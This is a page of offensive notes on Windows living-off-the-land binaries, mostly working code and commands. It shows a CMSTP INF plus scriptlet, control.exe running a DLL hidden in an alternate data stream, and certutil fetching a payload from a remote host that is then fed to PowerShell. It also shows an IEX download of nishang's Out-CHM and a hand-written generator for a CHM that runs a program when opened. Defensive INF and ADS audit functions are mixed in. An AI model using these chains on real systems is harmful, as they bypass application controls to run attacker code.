SCT & CHM exploit

Living Off the Land

CMSTP.exe

  • payload calc.sct (a COM scriptlet; whatever sits in <script> under <registration> runs as soon as scrobj.dll processes the file, so no method ever has to be called)
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
    <script language="JScript">
        <![CDATA[
            var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
        ]]>
    </script>
</registration>
</scriptlet>
  • stager cmstp.inf (%11% is the INF LDID for the System32 directory; the entry format is dll,flags,param, and flags NI tell advpack not to call DllRegisterServer but to call scrobj.dll's DllInstall with the .sct path as its argument; scrobj.dll runs the scriptlet's <registration> script whether it is installing or uninstalling, the same mechanism regsvr32 /i:file.sct scrobj.dll abuses)
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall_SingleUser]
UnRegisterOCXs=UnRegisterOCXSection

[UnRegisterOCXSection]
%11%\scrobj.dll,NI,C:\calc.sct

[Strings]
AppAct = "SOFTWARE\Microsoft\Connection Manager"
ServiceName="Yay"
ShortSvcName="Yay"
  • run (/ni = no desktop icon, /s = silent; cmstp.exe is Microsoft-signed and lives in System32, which is why this is a LOLBin)
    cmstp.exe /ni /s cmstp.inf
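A check for the pattern above, as an added example that is not from the page or from the original PoC: it parses an .inf the way advpack reads it, follows RegisterOCXs/UnRegisterOCXs from any [DefaultInstall*] section, expands %11%, and reports entries that hand an argument to scrobj.dll's DllInstall; it also pulls the registration script out of the referenced .sct. Windows PowerShell 5.1; the only assumptions are the file paths from this page (cmstp.inf, C:\calc.sct).

```powershell
# Added example, not from the page: audit an .inf for the CMSTP / scrobj.dll scriptlet-loading
# pattern and show what the referenced .sct would run. Windows PowerShell 5.1; paths are assumptions.

function Get-InfSections {
    # Returns a hashtable (case-insensitive, like INF section names): section -> non-comment lines.
    param([Parameter(Mandatory)][string]$Path)
    $sections = @{}
    $current = $null
    foreach ($raw in (Get-Content -Path $Path)) {
        $line = $raw.Trim()
        if ($line -eq '' -or $line.StartsWith(';')) { continue }   # blank or comment
        if ($line -match '^\[(.+)\]$') {                           # [SectionName]
            $current = $Matches[1]
            $sections[$current] = New-Object System.Collections.Generic.List[string]
            continue
        }
        if ($null -ne $current) { $sections[$current].Add($line) }
    }
    return $sections
}

function Find-ScriptletLoad {
    # Flags RegisterOCXs / UnRegisterOCXs entries that pass an argument to scrobj.dll (flag I = call DllInstall).
    param([Parameter(Mandatory)][string]$InfPath)
    $sections = Get-InfSections -Path $InfPath
    $system32 = Join-Path $env:SystemRoot 'System32'
    $findings = @()
    foreach ($install in @($sections.Keys | Where-Object { $_ -like 'DefaultInstall*' })) {
        foreach ($directive in $sections[$install]) {
            if ($directive -match '^(Un)?RegisterOCXs\s*=\s*(.+)$') {
                $ocxSection = $Matches[2].Trim()
                if (-not $sections.ContainsKey($ocxSection)) { continue }
                foreach ($entry in $sections[$ocxSection]) {
                    # Entry format is <dll>,<flags>,<param>; %11% is the LDID for the system directory.
                    $parts = $entry -split ',', 3
                    $dll   = ($parts[0].Trim() -replace '%11%', $system32)
                    $flags = if ($parts.Count -gt 1) { $parts[1].Trim() } else { '' }
                    $param = if ($parts.Count -gt 2) { $parts[2].Trim() } else { '' }
                    if ($dll -match '(^|\\)scrobj\.dll$' -and $flags -match 'I') {
                        $findings += [pscustomobject]@{
                            InstallSection = $install
                            Directive      = $directive
                            Dll            = $dll
                            Flags          = $flags
                            DllInstallArg  = $param      # local .sct path or URL that scrobj.dll will load
                        }
                    }
                }
            }
        }
    }
    return $findings
}

function Get-ScriptletRegistration {
    # Extracts the script scrobj.dll executes while registering/unregistering a .sct:
    # anything inside <script> under <registration> runs without any method being called.
    param([Parameter(Mandatory)][string]$SctPath)
    $text = Get-Content -Path $SctPath -Raw
    $reg  = [regex]::Match($text, '<registration\b([^>]*)>(.*?)</registration>', 'IgnoreCase, Singleline')
    if (-not $reg.Success) { return $null }
    $attrs  = $reg.Groups[1].Value
    $script = [regex]::Match($reg.Groups[2].Value, '<script\b[^>]*>(.*?)</script>', 'IgnoreCase, Singleline')
    [pscustomobject]@{
        ProgId                = [regex]::Match($attrs, 'progid\s*=\s*"([^"]*)"', 'IgnoreCase').Groups[1].Value
        ClassId               = [regex]::Match($attrs, 'classid\s*=\s*"([^"]*)"', 'IgnoreCase').Groups[1].Value
        HasRegistrationScript = $script.Success
        Code                  = ($script.Groups[1].Value -replace '<!\[CDATA\[|\]\]>', '').Trim()
    }
}

# Usage with the page's files:
#   Find-ScriptletLoad -InfPath .\cmstp.inf | Format-List
#   Get-ScriptletRegistration -SctPath C:\calc.sct
```

The DllInstallArg column is the thing to alert on: a legitimate Connection Manager profile never hands scrobj.dll a path or URL, and the same parser applies to the regsvr32 variant since the .sct is identical.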

Control.exe

  • create a DLL with msfvenom or a custom one (control.exe loads the path like a .cpl, so a payload that runs from DllMain works)
  • put it in an Alternate Data Stream (ADS) of a harmless file (dir and Get-ChildItem do not show streams; dir /r does)
C:\Users\IEUser\Documents>echo "demo" > C:\demo\test.txt

C:\Users\IEUser\Documents>type calc.dll > C:\demo\test.txt:calc.dll
  • execute with control.exe, pointing it at the stream
    control.exe C:\demo\test.txt:calc.dll

reference

https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-1/

CertUtil

  • what the command does
    • download, encode, decode (certutil is a signed certificate-management tool; -urlcache -split -f fetches an arbitrary URL and saves it to the given path, and that path can be a stream)
  • download the payload and write it into a data stream
certutil -urlcache -split -f http://192.168.1.210/certutil.txt C:\demo\test2.txt:certutil
  • payload is a simple PowerShell command
start-process calc.exe
  • execute by feeding the stream to powershell.exe on stdin (execution policy only governs script files, not commands read this way; powershell -ep bypass - < file is the fully explicit form, where - means read commands from stdin)
powershell < C:\demo\test2.txt:certutil
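Both ADS sections above (Control.exe and CertUtil) leave the same artifact: a named stream on an innocuous file. The following added example, not from the page or from the referenced posts, does the drop natively in Windows PowerShell 5.1 and then runs the audit a defender would use to find it. C:\demo and the stream names follow the page; the source DLL path (.\calc.dll) is an assumption.

```powershell
# Added example, not from the page: drop a payload into an ADS the way the two sections above do,
# then audit a directory tree for non-default streams. Windows PowerShell 5.1 syntax (-Encoding Byte);
# C:\demo and the stream names are the page's, the source DLL path is an assumption.

function Write-AdsPayload {
    param(
        [Parameter(Mandatory)][string]$HostFile,  # innocuous carrier, e.g. C:\demo\test.txt
        [Parameter(Mandatory)][string]$Stream,    # stream name, e.g. calc.dll
        [Parameter(Mandatory)][string]$Source     # file whose bytes are copied into the stream
    )
    $dir = Split-Path -Parent $HostFile
    if ($dir -and -not (Test-Path -LiteralPath $dir)) { New-Item -ItemType Directory -Path $dir | Out-Null }
    if (-not (Test-Path -LiteralPath $HostFile)) { Set-Content -LiteralPath $HostFile -Value 'demo' }
    $bytes = [System.IO.File]::ReadAllBytes($Source)
    # Same effect as  type calc.dll > C:\demo\test.txt:calc.dll  but without cmd's text handling.
    Set-Content -LiteralPath $HostFile -Stream $Stream -Value $bytes -Encoding Byte
    return (Get-Item -LiteralPath $HostFile -Stream $Stream).Length
}

function Find-AlternateStreams {
    # Lists every named stream under $Root and classifies it by its first two bytes.
    # dir and Get-ChildItem never show these; dir /r and Get-Item -Stream * do.
    param([Parameter(Mandatory)][string]$Root)
    Get-ChildItem -LiteralPath $Root -File -Recurse -Force | ForEach-Object {
        $file = $_.FullName
        Get-Item -LiteralPath $file -Stream * -ErrorAction SilentlyContinue |
            Where-Object { $_.Stream -ne ':$DATA' } |       # ':$DATA' is the normal file content
            ForEach-Object {
                $head = @(Get-Content -LiteralPath $file -Stream $_.Stream -Encoding Byte -TotalCount 2 -ErrorAction SilentlyContinue)
                $kind = if ($head.Count -ge 2 -and $head[0] -eq 0x4D -and $head[1] -eq 0x5A) { 'PE image (MZ)' }
                        elseif ($_.Stream -eq 'Zone.Identifier') { 'Mark-of-the-Web (expected)' }
                        else { 'text/script' }
                [pscustomobject]@{ File = $file; Stream = $_.Stream; Bytes = $_.Length; Kind = $kind }
            }
    }
}

# Usage, mirroring the page:
#   Write-AdsPayload -HostFile C:\demo\test.txt -Stream calc.dll -Source .\calc.dll
#   control.exe C:\demo\test.txt:calc.dll
#   Find-AlternateStreams -Root C:\demo | Format-Table -AutoSize
#   Remove-Item -LiteralPath C:\demo\test.txt -Stream calc.dll     # removes the stream only
```

Zone.Identifier streams are everywhere on a real host (every downloaded file has one), so the classification column matters more than the count; an MZ header or a PowerShell one-liner in a stream attached to a .txt or .log file is the signal.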

hh.exe

  • create the help file with Out-CHM from nishang (needs the HTML Help Workshop compiler, hhc.exe; the resulting CHM embeds an HTML Help shortcut object that runs the payload when hh.exe renders the page)
PS C:\Users\IEUser> IEX (iwr "https://raw.githubusercontent.com/samratashok/nishang/master/Client/Out-CHM.ps1")

PS C:\Users\IEUser\Documents> Out-CHM -Payload "calc" -HHCPath "C:\Program Files (x86)\HTML Help Workshop"
Microsoft HTML Help Compiler 4.74.8702

Compiling c:\Users\IEUser\Documents\doc.chm


Compile time: 0 minutes, 0 seconds
2       Topics
4       Local links
4       Internet links
0       Graphics


Created c:\Users\IEUser\Documents\doc.chm, 13,422 bytes
  • execute with hh.exe (double-clicking the .chm does the same)
    hh.exe doc.chm
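Out-CHM hides what the .chm actually contains. The following added example, which is independent code and not nishang's script, builds the same kind of file by hand: a single HTML page carrying the HTML Help shortcut ActiveX object (CLSID adb880a6-d8ff-11cf-9377-00aa003b7a11) whose Item1 parameter names a program and its arguments, triggered from inline script, then compiled with hhc.exe. It assumes HTML Help Workshop at the path the page uses and writes into a chm subdirectory of the current folder; the payload (cmd.exe /c calc.exe) is the page's calc.

```powershell
# Added example, independent of nishang's Out-CHM: build a .chm whose only page carries the
# HTML Help shortcut object and compile it with hhc.exe. Assumes HTML Help Workshop at the
# page's path; output directory and payload are assumptions you can change.

function New-ShortcutChm {
    param(
        [string]$OutDir    = (Join-Path $PWD 'chm'),
        [string]$HhcPath   = 'C:\Program Files (x86)\HTML Help Workshop\hhc.exe',
        [string]$Program   = 'cmd.exe',
        [string]$Arguments = '/c calc.exe'
    )
    New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

    # HHCtrl.ocx "ShortCut" command: Item1 is "<window class>,<program>,<arguments>";
    # Item2 is an optional window message (273 = WM_COMMAND) that only matters when Item1's
    # window class is already open. Click() fires the shortcut without any user action.
    $html = @"
<html><head><title>Help</title></head><body>
<object id="sc" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width="1" height="1">
  <param name="Command" value="ShortCut">
  <param name="Button"  value="Bitmap::shortcut">
  <param name="Item1"   value=",$Program,$Arguments">
  <param name="Item2"   value="273,1,1">
</object>
<script>sc.Click();</script>
</body></html>
"@
    $hhp = @"
[OPTIONS]
Compatibility=1.1 or later
Compiled file=doc.chm
Default topic=doc.htm
Display compile progress=No
Language=0x409 English (United States)

[FILES]
doc.htm
"@
    Set-Content -LiteralPath (Join-Path $OutDir 'doc.htm') -Value $html -Encoding Ascii
    Set-Content -LiteralPath (Join-Path $OutDir 'doc.hhp') -Value $hhp  -Encoding Ascii

    # hhc.exe's exit code is not a success indicator (it returns 1 on success), so check the output file.
    & $HhcPath (Join-Path $OutDir 'doc.hhp') | Out-Null
    $chm = Join-Path $OutDir 'doc.chm'
    if (-not (Test-Path -LiteralPath $chm)) { throw "hhc.exe did not produce $chm" }
    return $chm
}

# Usage:  $chm = New-ShortcutChm; hh.exe $chm
```

Because the trigger is an ordinary HTML page inside the archive, the same object and CLSID are what to look for when triaging a suspicious .chm: decompile it with hh.exe -decompile <dir> <file.chm> and grep the extracted HTML for the ShortCut command.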

reference

https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/